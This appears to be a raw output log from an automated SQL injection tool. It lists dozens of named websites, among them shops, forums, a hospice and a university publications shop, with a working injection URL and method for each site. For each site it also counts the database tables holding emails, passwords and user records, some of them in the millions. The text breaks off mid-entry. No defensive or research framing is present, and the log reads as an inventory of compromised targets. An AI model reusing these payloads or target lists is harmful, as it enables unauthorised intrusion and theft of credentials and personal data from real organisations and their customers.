Macbryan.data_pastel\r\nTotal Rows:9,987\r\nSearch:password\r\nRows:2,966\r\n[2,966] Macbryan.User\r\nTotal Rows:14,732\r\nSearch:user\r\nRows:4,745\r\n[2,966] Macbryan.User\r\n[1,691] Macbryan.OrderHead\r\n[88] Macbryan.tbl_promo_response\r\n\r\ngtcp.org\r\nURL:http://www.gtcp.org/rainbowroom_detail.asp?ID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:133\r\n[131] db1056072_gtcp.Community_Rainbow_Rooms\r\n[2] db1056072_gtcp.Users_Old\r\nTotal Rows:196\r\nSearch:admin\r\nRows:63\r\n[37] db1056072_gtcp.DesktopModules\r\n[21] db1056072_gtcp.Tabs\r\n[4] db1056072_gtcp.Skins\r\n[1] db1056072_gtcp.Portals\r\nTotal Rows:200\r\nSearch:password\r\nRows:4\r\n[2] db1056072_gtcp.Users_Old\r\n[1] db1056072_gtcp.Portals\r\n[1] db1056072_gtcp.Users\r\nTotal Rows:211\r\nSearch:user\r\nRows:11\r\n[3] db1056072_gtcp.Links\r\n[2] db1056072_gtcp.UserRoles\r\n[2] db1056072_gtcp.Users_Old\r\n[1] db1056072_gtcp.Portals\r\n[1] db1056072_gtcp.Profile\r\n[1] db1056072_gtcp.SiteLog\r\n[1] db1056072_gtcp.UserPortals\r\n\r\nbalidyanavillas.com\r\nURL:http://www.balidyanavillas.com/news-promo.asp?id=999999.9 union all select 1,2,[t],4,5,6,7\r\nMethod:MySQL Union\r\nSearch:password\r\nRows:6\r\n[6] dyanavillas_com_db.tb_admin_login\r\nTotal Rows:12\r\nSearch:user\r\nRows:6\r\n[6] dyanavillas_com_db.tb_admin_login\r\n\r\nanglerworld.com\r\nURL:http://www.anglerworld.com/bassfish/bassboard/rods_reels/message.html?message_id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:1,834,425\r\n[1,496,951] NEWBOARD.comment_owner_info\r\n[336,354] NEWBOARD.message_owner_info\r\n[1,120] NEWBOARD.guides\r\nTotal Rows:1,835,545\r\nSearch:password\r\nRows:1,120\r\n[1,120] NEWBOARD.guides\r\nTotal Rows:3,670,038\r\nSearch:user\r\nRows:1,834,493\r\n[1,496,951] NEWBOARD.comment_owner_info\r\n[336,354] NEWBOARD.message_owner_info\r\n[1,120] NEWBOARD.guides\r\n[68] NEWBOARD.messageboard_information\r\n\r\nperfectorganics.com\r\nURL:http://www.perfectorganics.com/shop/products.asp?id=2&subcat=3&details=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:3,727\r\n[1,839] 33367_perfectorganicscom.customers\r\n[847] 33367_perfectorganicscom.MailingList\r\n[526] 33367_perfectorganicscom.MailingList_B\r\n[242] 33367_perfectorganicscom.holiday_2002\r\n[191] 33367_perfectorganicscom.holiday_2002_2nd\r\n[29] 33367_perfectorganicscom.mailtest3\r\n[24] 33367_perfectorganicscom.news\r\n[8] 33367_perfectorganicscom.T_COMMENTS\r\n[4] 33367_perfectorganicscom.mailtest2\r\n[4] 33367_perfectorganicscom.tblLogin\r\n[4] 33367_perfectorganicscom.test_3\r\n[3] 33367_perfectorganicscom.listnames\r\n[2] 33367_perfectorganicscom.tracking_list\r\n[2] 33367_perfectorganicscom.TradeshowList\r\n[1] 33367_perfectorganicscom.contacts\r\n[1] 33367_perfectorganicscom.mailtest\r\nTotal Rows:4,168\r\nSearch:admin\r\nRows:441\r\n[242] 33367_perfectorganicscom.holiday_2002\r\n[191] 33367_perfectorganicscom.holiday_2002_2nd\r\n[4] 33367_perfectorganicscom.tblLogin\r\n[4] 33367_perfectorganicscom.test_3\r\nTotal Rows:4,174\r\nSearch:password\r\nRows:6\r\n[4] 33367_perfectorganicscom.tblLogin\r\n[2] 33367_perfectorganicscom.contact_admins\r\nTotal Rows:6,019\r\nSearch:user\r\nRows:1,845\r\n[1,839] 33367_perfectorganicscom.customers\r\n[4] 33367_perfectorganicscom.tblLogin\r\n[2] 33367_perfectorganicscom.contact_admins\r\n\r\nextranet.gsbfundraising.com\r\nURL:http://extranet.gsbfundraising.com/partnersandaffiliates.asp?ID=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:21\r\n[21] gsbdb.partnersaffiliates\r\nTotal Rows:22\r\nSearch:password\r\nRows:1\r\n[1] gsbdb.users\r\nTotal Rows:23\r\nSearch:user\r\nRows:1\r\n[1] gsbdb.users\r\n\r\nhamptonaffiliates.com\r\nURL:http://www.hamptonaffiliates.com/LocationDetails.asp?ID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:474\r\n[301] Internet.Users\r\n[134] Internet.TempUser\r\n[39] Internet.SalesPerson\r\nTotal Rows:2,067\r\nSearch:admin\r\nRows:1,593\r\n[1,593] Internet.Visitors\r\nTotal Rows:2,368\r\nSearch:password\r\nRows:301\r\n[301] Internet.Users\r\nTotal Rows:10,007\r\nSearch:user\r\nRows:7,639\r\n[5,063] Internet.UserCompanyAddress\r\n[1,593] Internet.Visitors\r\n[651] Internet.Spot_Log\r\n[301] Internet.Users\r\n[26] Internet.Spot_TraceGlobalData\r\n[4] Internet.UserType\r\n[1] Internet.Spot_TraceGlobalSummary\r\n\r\ntodaikorea.com\r\nURL:http://www.todaikorea.com/board/faq_list.asp?board_id=2\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:user\r\nRows:75,665\r\n[75,597] todai_old.todai_custom_t\r\n[68] todai_old.POPUP_TBL\r\n\r\nisgeng.co.za\r\nURL:http://www.isgeng.co.za/item_detail.asp?item_id=1567dada529d8cc96999999.9\' union all select [t],2,3,4,5,6 and \'0\'=\'0\r\nMethod:MySQL Union\r\nSearch:password\r\nRows:1\r\n[1] isgdb.UserTbl\r\nTotal Rows:2\r\nSearch:user\r\nRows:1\r\n[1] isgdb.UserTbl\r\n\r\nclublighthousepublishing.com\r\nURL:http://clublighthousepublishing.com/productpage.asp?bNumb=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:1,603\r\n[1,422] ReferenceNumbers.Orders\r\n[125] ReferenceNumbers.authors\r\n[31] ReferenceNumbers.iyzi_Members\r\n[25] ReferenceNumbers.Comments\r\nTotal Rows:1,634\r\nSearch:password\r\nRows:31\r\n[31] ReferenceNumbers.iyzi_Members\r\nTotal Rows:1,636\r\nSearch:user\r\nRows:2\r\n[2] ReferenceNumbers.Admin\r\n\r\ncart.shoppingtechnology.com\r\nURL:http://cart.shoppingtechnology.com/cart/affiliate-agreement.cfm?storeid=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:6,474\r\n[3,120] shoppingcart.accountinfo\r\n[2,298] shoppingcart.customers_copy\r\n[1,019] shoppingcart.getsite\r\n[26] shoppingcart.coupon\r\n[6] shoppingcart.renew\r\n[5] shoppingcart.approve\r\nTotal Rows:6,480\r\nSearch:admin\r\nRows:6\r\n[6] shoppingcart.urllinks\r\nTotal Rows:12,934\r\nSearch:password\r\nRows:6,454\r\n[3,120] shoppingcart.accountinfo\r\n[2,312] shoppingcart.customers\r\n[1,019] shoppingcart.getsite\r\n[3] shoppingcart.tools\r\nTotal Rows:16,055\r\nSearch:user\r\nRows:3,121\r\n[3,120] shoppingcart.accountinfo\r\n[1] shoppingcart.payflowpro\r\n\r\nnitroz.se\r\nURL:http://www.nitroz.se/motorny/shop/item_show.asp?code_no=amc7775\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:6\r\n[6] webshop_nitroz.supliers\r\nTotal Rows:8\r\nSearch:password\r\nRows:2\r\n[2] webshop_nitroz.users\r\n\r\ninternationalbeershop.com.au\r\nURL:http://www.internationalbeershop.com.au/products.asp?product_id=31 or 1=[t] and 1=1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:14,122\r\n[14,122] internationalbeershop_com_au.users\r\nTotal Rows:28,244\r\nSearch:admin\r\nRows:14,122\r\n[14,122] internationalbeershop_com_au.users\r\nTotal Rows:7,017,046\r\nSearch:user\r\nRows:6,988,802\r\n[5,386,822] internationalbeershop_com_au.user_product\r\n[1,320,364] internationalbeershop_com_au.user_newsletter\r\n[135,365] internationalbeershop_com_au.log\r\n[104,589] internationalbeershop_com_au.basket\r\n[19,604] internationalbeershop_com_au.orders\r\n[14,122] internationalbeershop_com_au.users\r\n[4,848] internationalbeershop_com_au.user_content\r\n[2,911] internationalbeershop_com_au.user_mail\r\n[177] internationalbeershop_com_au.user_login_log\r\n\r\ndarsharqiyat.com\r\nURL:http://darsharqiyat.com/book_details.asp?id=29\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:643\r\n[559] endapgg_glob.apg_orders\r\n[41] endapgg_glob.ll_Freelancers\r\n[18] endapgg_glob.ll_Clients\r\n[9] endapgg_glob.rag_customers\r\n[6] endapgg_glob.ftc_companies\r\n[4] endapgg_glob.ftc_labour\r\n[3] endapgg_glob.Tcl_Mailinglist\r\n[2] endapgg_glob.Tcl_Mailinglist0\r\n[1] endapgg_glob.apg_tickets\r\nTotal Rows:3,441\r\nSearch:password\r\nRows:2,798\r\n[1,455] endapgg_glob.manara_students\r\n[1,305] endapgg_glob.manara_students0\r\n[9] endapgg_glob.rag_customers\r\n[8] endapgg_glob.ll_user_login\r\n[7] endapgg_glob.ll_admin_login\r\n[6] endapgg_glob.ftc_companies\r\n[1] endapgg_glob.abnya_admin_login\r\n[1] endapgg_glob.apg_admin_login\r\n[1] endapgg_glob.ftc_admin_login\r\n[1] endapgg_glob.manara_admin_login\r\n[1] endapgg_glob.rag_admin_login\r\n[1] endapgg_glob.rag_users\r\n[1] endapgg_glob.sharq_admin_login\r\n[1] endapgg_glob.Tcl_Users\r\nTotal Rows:6,273\r\nSearch:user\r\nRows:2,832\r\n[1,455] endapgg_glob.manara_students\r\n[1,305] endapgg_glob.manara_students0\r\n[34] endapgg_glob.apg_itemsordered\r\n[9] endapgg_glob.rag_customers\r\n[8] endapgg_glob.ll_user_login\r\n[7] endapgg_glob.ll_admin_login\r\n[6] endapgg_glob.ftc_companies\r\n[1] endapgg_glob.abnya_admin_login\r\n[1] endapgg_glob.apg_admin_login\r\n[1] endapgg_glob.ftc_admin_login\r\n[1] endapgg_glob.manara_admin_login\r\n[1] endapgg_glob.rag_admin_login\r\n[1] endapgg_glob.rag_users\r\n[1] endapgg_glob.sharq_admin_login\r\n[1] endapgg_glob.Tcl_Users\r\n\r\nflaskstore.com\r\nURL:http://www.flaskstore.com/detail.asp?productId=999999.9 union all select 1,2,3,4,[t],6,7,8,9,10,11\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:357\r\n[357] jhendley.users\r\nTotal Rows:362\r\nSearch:password\r\nRows:5\r\n[5] jhendley.tblSecure\r\nTotal Rows:367\r\nSearch:user\r\nRows:5\r\n[5] jhendley.tblSecure\r\n\r\ninfostaff.com.br\r\nURL:http://www.infostaff.com.br/add_cart.asp?id_produto=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:1,383,818\r\n[1,133,451] n0u_infostaff_com_br.TABELA_EMAILS_COLETADOS_Comprada\r\n[221,292] n0u_infostaff_com_br.Tabela_Vendas\r\n[19,769] n0u_infostaff_com_br.TABELA_EMAILS_COLETADOS\r\n[3,721] n0u_infostaff_com_br.TABELA_EMAILS_COLETADOS1\r\n[1,679] n0u_infostaff_com_br.TABELA_MARKETING\r\n[1,536] n0u_infostaff_com_br.Lista_Daniel_Groupon\r\n[1,406] n0u_infostaff_com_br.NEWSLETTER_E-STAFF\r\n[483] n0u_infostaff_com_br.tbClientes\r\n[434] n0u_infostaff_com_br.Lojas\r\n[27] n0u_infostaff_com_br.tbCampanha_Marketing\r\n[10] n0u_infostaff_com_br.tbParceiros\r\n[6] n0u_infostaff_com_br.Afeta\r\n[4] n0u_infostaff_com_br.TABELA_EMAILS_COLETADOS2\r\nTotal Rows:1,383,820\r\nSearch:admin\r\nRows:2\r\n[1] n0u_infostaff_com_br.tbl_general\r\n[1] n0u_infostaff_com_br.tbl_general.BAK\r\nTotal Rows:1,383,849\r\nSearch:user\r\nRows:29\r\n[14] n0u_infostaff_com_br.tbl_client\r\n[13] n0u_infostaff_com_br.tbl_client.BAK\r\n[2] n0u_infostaff_com_br.tbl_login\r\n\r\ncarolinaretail.com\r\nURL:http://www.carolinaretail.com/category.asp?Cat=Christian Gift Wrap and Bags\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:441,199\r\n[410,745] CRP_Production.OrderHeaderImport\r\n[28,146] CRP_Production.Customers\r\n[1,904] CRP_Production.OrderHeader\r\n[402] CRP_Production.HistoryOrderHeaders\r\n[2] CRP_Production.Reps\r\nTotal Rows:469,353\r\nSearch:password\r\nRows:28,154\r\n[28,146] CRP_Production.Customers\r\n[6] CRP_Production.Users\r\n[2] CRP_Production.Reps\r\nTotal Rows:497,909\r\nSearch:user\r\nRows:28,556\r\n[28,146] CRP_Production.Customers\r\n[402] CRP_Production.HistoryOrderHeaders\r\n[6] CRP_Production.Users\r\n[2] CRP_Production.Reps\r\n\r\nchockstone.org\r\nURL:http://www.chockstone.org/Media/Review.asp?Action=Show&BookID=[t]&LimitFormat=M...\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:19,798\r\n[10,182] Chockstone.RHOrder\r\n[6,768] Chockstone.ForumUser\r\n[2,524] Chockstone.ForumUserPending\r\n[324] Chockstone.CruxClient\r\nTotal Rows:29,414\r\nSearch:password\r\nRows:9,616\r\n[6,768] Chockstone.ForumUser\r\n[2,524] Chockstone.ForumUserPending\r\n[324] Chockstone.CruxClient\r\nTotal Rows:329,247\r\nSearch:user\r\nRows:299,833\r\n[221,636] Chockstone.ForumMessage\r\n[39,764] Chockstone.ForumUserPrivateMessage\r\n[10,182] Chockstone.RHOrder\r\n[9,875] Chockstone.ForumPollVote\r\n[6,768] Chockstone.ForumUser\r\n[2,524] Chockstone.ForumUserPending\r\n[2,124] Chockstone.PictureComment\r\n[1,842] Chockstone.ForumSubjectUserConfig\r\n[1,363] Chockstone.ForumUserInteraction\r\n[1,180] Chockstone.ForumUserMessage\r\n[548] Chockstone.BookReview\r\n[375] Chockstone.Book\r\n[364] Chockstone.Link\r\n[344] Chockstone.BookURL\r\n[268] Chockstone.Picture\r\n[215] Chockstone.Event\r\n[206] Chockstone.Rebolt\r\n[172] Chockstone.ReboltQld\r\n[60] Chockstone.ReboltWA\r\n[23] Chockstone.EventAttendee\r\n\r\npeacehospicecare.org.uk\r\nURL:http://www.peacehospicecare.org.uk/viewevent.asp?eventID=499\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:5,739\r\n[3,370] peacehospicenew.tblorders\r\n[1,005] peacehospicenew.form_teamemail\r\n[446] peacehospicenew.news\r\n[423] peacehospicenew.event\r\n[198] peacehospicenew.vsp\r\n[104] peacehospicenew.job\r\n[80] peacehospicenew.lol_ceremony\r\n[71] peacehospicenew.ecard_creates\r\n[34] peacehospicenew.shopvsp\r\n[7] peacehospicenew.ecard_registrations\r\n[1] peacehospicenew.lol_settings\r\nTotal Rows:5,767\r\nSearch:password\r\nRows:28\r\n[21] peacehospicenew.security\r\n[7] peacehospicenew.ecard_registrations\r\nTotal Rows:8,125\r\nSearch:user\r\nRows:2,358\r\n[2,337] peacehospicenew.logged\r\n[21] peacehospicenew.security\r\n\r\nrainbowtekstil.no\r\nURL:http://www.rainbowtekstil.no/ehandel/product.asp?intProdID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:9,803\r\n[4,672] db1010363_RainbowTekstil.Bruker\r\n[2,919] db1010363_RainbowTekstil.USERS\r\n[1,800] db1010363_RainbowTekstil.Newsletter\r\n[395] db1010363_RainbowTekstil.MobilUsers\r\n[17] db1010363_RainbowTekstil.article\r\nTotal Rows:12,724\r\nSearch:password\r\nRows:2,921\r\n[2,919] db1010363_RainbowTekstil.USERS\r\n[1] db1010363_RainbowTekstil.config\r\n[1] db1010363_RainbowTekstil.Info\r\nTotal Rows:12,741\r\nSearch:user\r\nRows:17\r\n[17] db1010363_RainbowTekstil.article\r\n\r\necproducts.co.uk\r\nURL:http://www.ecproducts.co.uk/category.asp?item=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:1,994\r\n[1,397] ecproductsdb.Orders\r\n[597] ecproductsdb.CatalogueRequests\r\nTotal Rows:1,996\r\nSearch:admin\r\nRows:2\r\n[2] ecproductsdb.AdminUser\r\nTotal Rows:1,998\r\nSearch:password\r\nRows:2\r\n[2] ecproductsdb.AdminUser\r\nTotal Rows:2,000\r\nSearch:user\r\nRows:2\r\n[2] ecproductsdb.AdminUser\r\n\r\nonestopfaqs.com\r\nURL:http://www.onestopfaqs.com/type.asp?iType=999999.9 union all select 1,[t],3,4,5,6\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:50,999\r\n[25,586] dbonestopfaqs.tblanswers\r\n[24,905] dbonestopfaqs.tblquestions\r\n[508] dbonestopfaqs.tblalerts\r\nTotal Rows:51,000\r\nSearch:admin\r\nRows:1\r\n[1] dbonestopfaqs.tbladmin\r\nTotal Rows:51,001\r\nSearch:password\r\nRows:1\r\n[1] dbonestopfaqs.tbladmin\r\nTotal Rows:51,002\r\nSearch:user\r\nRows:1\r\n[1] dbonestopfaqs.tbladmin\r\n\r\nwlace.com\r\nURL:http://www.wlace.com/insight/registry/classlist.asp?catID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:37,461\r\n[28,075] whitelake.Profile\r\n[7,306] whitelake.Class\r\n[1,121] whitelake.profileExt_activities\r\n[604] whitelake.Instructor\r\n[353] whitelake.DistrictClientRep\r\n[1] whitelake.Client\r\n[1] whitelake.Contact\r\nTotal Rows:65,613\r\nSearch:password\r\nRows:28,152\r\n[28,075] whitelake.Profile\r\n[77] whitelake.Users\r\nTotal Rows:803,220\r\nSearch:user\r\nRows:737,607\r\n[187,018] whitelake.StatementDetail\r\n[139,836] whitelake.ReservationAgeGrp\r\n[71,115] whitelake.ReservationSpaceXref\r\n[55,763] whitelake.Registration\r\n[50,751] whitelake.Attendance\r\n[39,173] whitelake.ReservationFacilityXref\r\n[37,407] whitelake.ReservationDate\r\n[37,215] whitelake.Reservation\r\n[28,075] whitelake.Profile\r\n[26,670] whitelake.ActionLog\r\n[19,640] whitelake.ProfileFamily\r\n[7,306] whitelake.Class\r\n[6,969] whitelake.Course\r\n[5,793] whitelake.Statement\r\n[5,316] whitelake.ReservationConflictHolding\r\n[4,439] whitelake.ClassSpaceXref\r\n[4,192] whitelake.ClassFeeXref\r\n[1,554] whitelake.Fee\r\n[1,160] whitelake.ReservationSpaceXref_old\r\n[1,121] whitelake.profileExt_activities\r\n[1,121] whitelake.profileExt_medical\r\n[1,013] whitelake.ClassProgramRateXref\r\n[904] whitelake.Category\r\n[668] whitelake.Space\r\n[604] whitelake.Instructor\r\n[578] whitelake.SpaceFeeTypeXref\r\n[360] whitelake.BatchQueue\r\n[353] whitelake.DistrictClientRep\r\n[316] whitelake.ReservationFacilityXref_old\r\n[264] whitelake.Facility\r\n[191] whitelake.DistrictClient\r\n[183] whitelake.Payment\r\n[132] whitelake.ReservationFeeTypeXref\r\n[131] whitelake.AcctCode\r\n[56] whitelake.Form\r\n[49] whitelake.ReservationSchoolXref\r\n[46] whitelake.ProgramRate\r\n[19] whitelake.EquipmentItemFeeTypeXref\r\n[19] whitelake.EquipmentItems\r\n[18] whitelake.ServiceCat\r\n[17] whitelake.ProfileImmunization\r\n[10] whitelake.ReservationEquipmentXref\r\n[7] whitelake.AttendanceFeeXref\r\n[7] whitelake.AvailabilitySched\r\n[7] whitelake.FormProductXref\r\n[6] whitelake.Product\r\n[4] whitelake.ClientMsg\r\n[4] whitelake.ProductCategory\r\n[3] whitelake.ReservationEquipmentXref_old\r\n[1] whitelake.AwardViolation\r\n[1] whitelake.Client\r\n[1] whitelake.Contact\r\n[1] whitelake.Department\r\n\r\nhotshoppe.com\r\nURL:http://www.hotshoppe.com/productPage.asp?PID=617\' and [t] and \'1\'=\'1&CategoryID=10&CategoryName=BARBEQUE SAUCES & RUBS\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:14,170\r\n[6,342] movementdhwin_hs.emaillist\r\n[6,027] movementdhwin_hs.temailstats\r\n[1,794] movementdhwin_hs.emailtemp\r\n[2] movementdhwin_hs.tcontentcomments\r\n[2] movementdhwin_hs.tusers\r\n[1] movementdhwin_hs.admin\r\n[1] movementdhwin_hs.temailreturnstats\r\n[1] movementdhwin_hs.tsettings\r\nTotal Rows:14,172\r\nSearch:admin\r\nRows:2\r\n[2] movementdhwin_hs.tusers\r\nTotal Rows:14,178\r\nSearch:password\r\nRows:6\r\n[4] movementdhwin_hs.security\r\n[2] movementdhwin_hs.tusers\r\nTotal Rows:14,191\r\nSearch:user\r\nRows:13\r\n[4] movementdhwin_hs.security\r\n[3] movementdhwin_hs.tsessiontracking\r\n[2] movementdhwin_hs.tcontentcomments\r\n[2] movementdhwin_hs.tusers\r\n[2] movementdhwin_hs.tuserstrikes\r\n\r\nhornbyguide.com\r\nURL:http://www.hornbyguide.com/service_sheet_details.asp?sheetid=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:435\r\n[435] hornbydata.Donate\r\n\r\nbetaco.com\r\nURL:http://www.betaco.com/cmag_product_details.asp?productid=M7FAL21\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:7,475\r\n[6,844] betaco.customers\r\n[630] betaco.tblDistributors\r\n[1] betaco.master\r\nTotal Rows:7,489\r\nSearch:user\r\nRows:14\r\n[8] betaco.tblPageList_Users\r\n[5] betaco.tblUsers\r\n[1] betaco.tblMerge\r\n\r\nmundukmodingplantation.com\r\nURL:http://www.mundukmodingplantation.com/view_detail_room.asp?id=46540848494F4B7B8936B26C3567E09E\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:12,846\r\n[12,805] hordb_baskom1.RESERVATION\r\n[41] hordb_baskom1.COMPANY\r\nTotal Rows:12,847\r\nSearch:admin\r\nRows:1\r\n[1] hordb_baskom1.WEB_USERS\r\n\r\nfeaturewallpaper.com\r\nURL:http://www.featurewallpaper.com/product-details.asp?ID=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:1,349\r\n[1,224] holdendecor1.tblSampleRequests\r\n[56] holdendecor1.tbl_rlr_user_deleted\r\n[44] holdendecor1.tblDistributor\r\n[22] holdendecor1.tblHoldenOrders\r\n[2] holdendecor1.tblSubscriptionsFWP\r\n[1] holdendecor1.tblTradeCustomersx\r\nTotal Rows:1,839\r\nSearch:password\r\nRows:490\r\n[430] holdendecor1.tblTradeCustomers\r\n[56] holdendecor1.tbl_rlr_user_deleted\r\n[4] holdendecor1.tblUsers\r\n\r\neu.bosscom.com\r\nURL:http://eu.bosscom.com/product.asp?id=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:5,271\r\n[2,852] dan31064_bosscom.shopw_customercontacts\r\n[2,105] dan31064_bosscom.shopw_rma\r\n[296] dan31064_bosscom.shopw_newsletter\r\n[18] dan31064_bosscom.shopw_users\r\nTotal Rows:21,523\r\nSearch:admin\r\nRows:16,252\r\n[16,252] dan31064_bosscom.shopw_c5invoice\r\nTotal Rows:35,392\r\nSearch:password\r\nRows:13,869\r\n[13,869] dan31064_bosscom.shopw_customers\r\nTotal Rows:218,501\r\nSearch:user\r\nRows:183,109\r\n[104,393] dan31064_bosscom.shopw_customer_notes\r\n[56,809] dan31064_bosscom.shopw_orders\r\n[15,680] dan31064_bosscom.shopw_log\r\n[4,004] dan31064_bosscom.shopw_packinglists\r\n[1,786] dan31064_bosscom.shopw_rma_store\r\n[301] dan31064_bosscom.shopw_changedsalesperson\r\n[97] dan31064_bosscom.shopw_rma_images\r\n[19] dan31064_bosscom.shopw_shops\r\n[17] dan31064_bosscom.shopw_handbook\r\n[3] dan31064_bosscom.shopw_faq\r\n\r\ncannesguide.com\r\nURL:http://www.cannesguide.com/basics/faq/faqdetails.php?id=999999.9 union all select [t],2\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:3,165\r\n[1,331] CannesGuide.ax_ads\r\n[1,086] CannesGuide.AxAds\r\n[380] CannesGuide.Restaurants\r\n[102] CannesGuide.Orders\r\n[90] CannesGuide.Ads\r\n[74] CannesGuide.RestaurantFeedback\r\n[68] CannesGuide.ax_invoices\r\n[19] CannesGuide.Affiliates\r\n[9] CannesGuide.restaurants_pending\r\n[6] CannesGuide.CFVGOrders\r\nTotal Rows:3,184\r\nSearch:password\r\nRows:19\r\n[19] CannesGuide.Affiliates\r\n\r\npeacehospice.org.uk\r\nURL:http://www.peacehospice.org.uk/viewevent.asp?eventID=536\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:5,739\r\n[3,370] peacehospicenew.tblorders\r\n[1,005] peacehospicenew.form_teamemail\r\n[446] peacehospicenew.news\r\n[423] peacehospicenew.event\r\n[198] peacehospicenew.vsp\r\n[104] peacehospicenew.job\r\n[80] peacehospicenew.lol_ceremony\r\n[71] peacehospicenew.ecard_creates\r\n[34] peacehospicenew.shopvsp\r\n[7] peacehospicenew.ecard_registrations\r\n[1] peacehospicenew.lol_settings\r\nTotal Rows:5,767\r\nSearch:password\r\nRows:28\r\n[21] peacehospicenew.security\r\n[7] peacehospicenew.ecard_registrations\r\nTotal Rows:8,125\r\nSearch:user\r\nRows:2,358\r\n[2,337] peacehospicenew.logged\r\n[21] peacehospicenew.security\r\n\r\nnjaes.rutgers.edu\r\nURL:http://njaes.rutgers.edu/pubs/category.asp?cat=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:414\r\n[392] shop.tblCustomers\r\n[22] shop.tblUsers\r\nTotal Rows:828\r\nSearch:password\r\nRows:414\r\n[392] shop.tblCustomers\r\n[22] shop.tblUsers\r\nTotal Rows:1,242\r\nSearch:user\r\nRows:414\r\n[392] shop.tblCustomers\r\n[22] shop.tblUsers\r\n\r\ncibse-mnw.org\r\nURL:http://www.cibse-mnw.org/events.asp?id=999999.9 union all select 1,2,3,4,5,6,7,8,[t],10,11\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:106\r\n[73] cibseyen.tbl_emailaddresses\r\n[28] cibseyen.tbl_committee\r\n[2] cibseyen.tbl_organisation\r\n[2] cibseyen.tbl_profiles\r\n[1] cibseyen.tbl_vacancies\r\nTotal Rows:138\r\nSearch:admin\r\nRows:32\r\n[30] cibseyen.tbl_securityhold\r\n[2] cibseyen.tbl_administrators\r\nTotal Rows:170\r\nSearch:user\r\nRows:32\r\n[30] cibseyen.tbl_securityhold\r\n[2] cibseyen.tbl_administrators\r\n\r\ncarolinacandy.com\r\nURL:https://www.carolinacandy.com/OrderForm.asp?cart=\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:459\r\n[459] CarolinaCandy.tbl_customers\r\nTotal Rows:461\r\nSearch:admin\r\nRows:2\r\n[2] CarolinaCandy.tbl_adminusers\r\nTotal Rows:922\r\nSearch:password\r\nRows:461\r\n[459] CarolinaCandy.tbl_customers\r\n[2] CarolinaCandy.tbl_adminusers\r\nTotal Rows:1,383\r\nSearch:user\r\nRows:461\r\n[459] CarolinaCandy.tbl_customers\r\n[2] CarolinaCandy.tbl_adminusers\r\n\r\n99bluebananas.com\r\nURL:http://www.99bluebananas.com/addcart.asp?id=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:7,792\r\n[7,653] 99b1ue.tbl99Customer\r\n[92] 99b1ue.tbl99RemSent\r\n[47] 99b1ue.tblSupp\r\nTotal Rows:7,793\r\nSearch:user\r\nRows:1\r\n[1] 99b1ue.tbl99User\r\n\r\npentrace.net\r\nURL:http://pentrace.net/penbase/Data_Returns/full_article.asp?id=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:71\r\n[71] donalhiggins.authors\r\n\r\nsms-siemag.com\r\nURL:http://www.sms-siemag.com/en/pressdetails.php?id=1010\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:4,285\r\n[4,257] admin_sms_group.formulare\r\n[28] admin_sms_group.ansprechpartner\r\nTotal Rows:4,498\r\nSearch:user\r\nRows:213\r\n[155] admin_sms_group.messen\r\n[54] admin_sms_group.p_messen\r\n[4] admin_sms_group.change_log\r\n\r\nmyesrog.com\r\nURL:http://www.myesrog.com/cmsPage.asp?id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:10,417\r\n[4,095] myesrog_db.tbl_Oitems\r\n[3,723] myesrog_db.tbl_orders\r\n[1,818] myesrog_db.tbl_customer\r\n[377] myesrog_db.tbl_newLetter\r\n[359] myesrog_db.tbl_ContactUS\r\n[19] myesrog_db.tbl_retailer\r\n[11] myesrog_db.tbl_repparts\r\n[9] myesrog_db.tbl_store\r\n[4] myesrog_db.tbl_custCoverInq\r\n[1] myesrog_db.tbl_adminUsers\r\n[1] myesrog_db.tbl_shippingHandling\r\nTotal Rows:14,159\r\nSearch:admin\r\nRows:3,742\r\n[3,723] myesrog_db.tbl_orders\r\n[19] myesrog_db.cms_pages_items\r\nTotal Rows:15,978\r\nSearch:password\r\nRows:1,819\r\n[1,818] myesrog_db.tbl_customer\r\n[1] myesrog_db.tbl_adminUsers\r\nTotal Rows:15,979\r\nSearch:user\r\nRows:1\r\n[1] myesrog_db.tbl_adminUsers\r\n\r\nrs700.org\r\nURL:http://www.rs700.org/index.asp?selection=News 